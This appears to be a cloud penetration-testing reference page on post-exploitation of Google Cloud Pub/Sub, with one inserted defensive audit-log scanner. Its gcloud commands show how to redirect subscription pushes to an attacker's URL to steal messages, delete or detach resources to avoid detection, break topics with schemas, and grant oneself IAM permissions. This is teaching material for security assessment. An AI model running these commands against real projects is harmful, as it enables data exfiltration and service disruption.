GCP - Pub/Sub Post Exploitation


Pub/Sub

For more information about Pub/Sub, check the following page:

GCP - Pub/Sub Enum

pubsub.topics.publish

Publish a message in a topic. This is useful for sending unexpected data and triggering unexpected functionality or exploiting vulnerabilities:

```bash
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
```

pubsub.topics.detachSubscription

Useful for preventing a subscription from receiving messages, perhaps to avoid detection.

```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```

pubsub.topics.delete

Useful for preventing a subscription from receiving messages, perhaps to avoid detection.
A topic can be deleted even when subscriptions are attached to it.

```bash
gcloud pubsub topics delete <TOPIC NAME>
```

pubsub.topics.update

Use this permission to update some settings of the topic in order to disrupt it, such as `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...

pubsub.topics.setIamPolicy

Give yourself permission to perform any of the previous attacks.

pubsub.subscriptions.create, pubsub.topics.attachSubscription, (pubsub.subscriptions.consume)

Receive all the messages in a web server:

```bash
# Create a push subscription and receive all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
```

Create a subscription and use it to pull messages:

```bash
# Create a pull subscription on the topic
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# This will retrieve a non-ACKed message (and won't ACK it)
# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
# This command will wait for a message to be posted
```

pubsub.subscriptions.delete

Deleting a subscription can be useful for disrupting a log processing system or something similar:

```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```

pubsub.subscriptions.update

Use this permission to update some settings so that messages are stored in a place you can access (URL, BigQuery table, bucket), or just to disrupt it.

```bash
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
```
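A defender-side check for the push-subscription creation and update described above, as an added example that is not part of the original page: it reviews Pub/Sub Cloud Audit Logs entries and flags push endpoints on hosts outside an allowlist, plus detach and delete calls. The allowlisted host, the sample entries and the exact layout of the `request` field are assumptions; confirm the layout against your own logs.

```python
import json
from urllib.parse import urlsplit

# Assumption: push delivery is only expected to hosts the organisation owns.
ALLOWED_PUSH_HOSTS = {"ingest.corp.example"}
PUSH_METHODS = {
    "google.pubsub.v1.Subscriber.CreateSubscription",
    "google.pubsub.v1.Subscriber.UpdateSubscription",
    "google.pubsub.v1.Subscriber.ModifyPushConfig",
}
DISRUPTIVE_METHODS = {
    "google.pubsub.v1.Publisher.DetachSubscription",
    "google.pubsub.v1.Publisher.DeleteTopic",
    "google.pubsub.v1.Subscriber.DeleteSubscription",
}

def push_endpoint(request):
    """Return the push endpoint found in an audit-log request body, or None."""
    # Assumed layout: UpdateSubscription nests the resource under "subscription";
    # CreateSubscription and ModifyPushConfig carry pushConfig at the top level.
    sub = request.get("subscription")
    body = sub if isinstance(sub, dict) else request
    return (body.get("pushConfig") or {}).get("pushEndpoint")

def review(entry):
    """Return (severity, reason) for one audit log entry, or None if unremarkable."""
    payload = entry.get("protoPayload", {})
    method = payload.get("methodName", "")
    who = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
    if method in PUSH_METHODS:
        endpoint = push_endpoint(payload.get("request", {}))
        host = urlsplit(endpoint).hostname if endpoint else None
        if host and host.lower() not in ALLOWED_PUSH_HOSTS:
            return ("high", f"{who} set push endpoint on unapproved host {host}")
    if method in DISRUPTIVE_METHODS:
        return ("medium", f"{who} called {method.rsplit('.', 1)[-1]}")
    return None

# Constructed sample entries (one JSON object per line), not real log data.
SAMPLE_LOG = """
{"protoPayload": {"methodName": "google.pubsub.v1.Subscriber.CreateSubscription", "authenticationInfo": {"principalEmail": "dev@corp.example"}, "request": {"name": "projects/p/subscriptions/s1", "topic": "projects/p/topics/orders", "pushConfig": {"pushEndpoint": "https://collector.unknown.example/hook"}}}}
{"protoPayload": {"methodName": "google.pubsub.v1.Subscriber.UpdateSubscription", "authenticationInfo": {"principalEmail": "ops@corp.example"}, "request": {"subscription": {"name": "projects/p/subscriptions/s2", "pushConfig": {"pushEndpoint": "https://ingest.corp.example/pubsub"}}}}}
{"protoPayload": {"methodName": "google.pubsub.v1.Publisher.DetachSubscription", "authenticationInfo": {"principalEmail": "dev@corp.example"}, "request": {"subscription": "projects/p/subscriptions/audit-sink"}}}
{"protoPayload": {"methodName": "google.pubsub.v1.Subscriber.CreateSubscription", "authenticationInfo": {"principalEmail": "ops@corp.example"}, "request": {"name": "projects/p/subscriptions/s3", "topic": "projects/p/topics/orders"}}}
"""

def scan(log_text):
    """Review each JSON line and return the list of findings."""
    entries = (json.loads(l) for l in log_text.splitlines() if l.strip())
    return [hit for hit in map(review, entries) if hit]
```
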

pubsub.subscriptions.setIamPolicy

Give yourself the permissions needed to perform any of the previously described attacks.

pubsub.schemas.attach, pubsub.topics.update, (pubsub.schemas.create)

Attach a schema to the topic so that messages do not comply with it and the topic is therefore disrupted.
If there are no schemas, you might need to create one.

schema.json

```json
{
  "namespace": "com.example",
  "type": "record",
  "name": "Person",
  "fields": [
    {
      "name": "name",
      "type": "string"
    },
    {
      "name": "age",
      "type": "int"
    }
  ]
}
```

```bash
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
    --schema=projects/<project-name>/schemas/<topic-id> \
    --message-encoding=json
```

pubsub.schemas.delete

It might look as though deleting a schema would let you send messages that do not comply with the schema. However, because the schema will be deleted, no message will actually enter the topic. So this is USELESS:

```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```

pubsub.schemas.setIamPolicy

Give yourself the permissions needed to perform any of the previously discussed attacks.

pubsub.snapshots.create, pubsub.snapshots.seek

This will create a snapshot of all the unACKed messages and put them back into the subscription. Not very useful for an attacker, but here it is:

```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
    --subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
    --snapshot=YOUR_SNAPSHOT_NAME
```
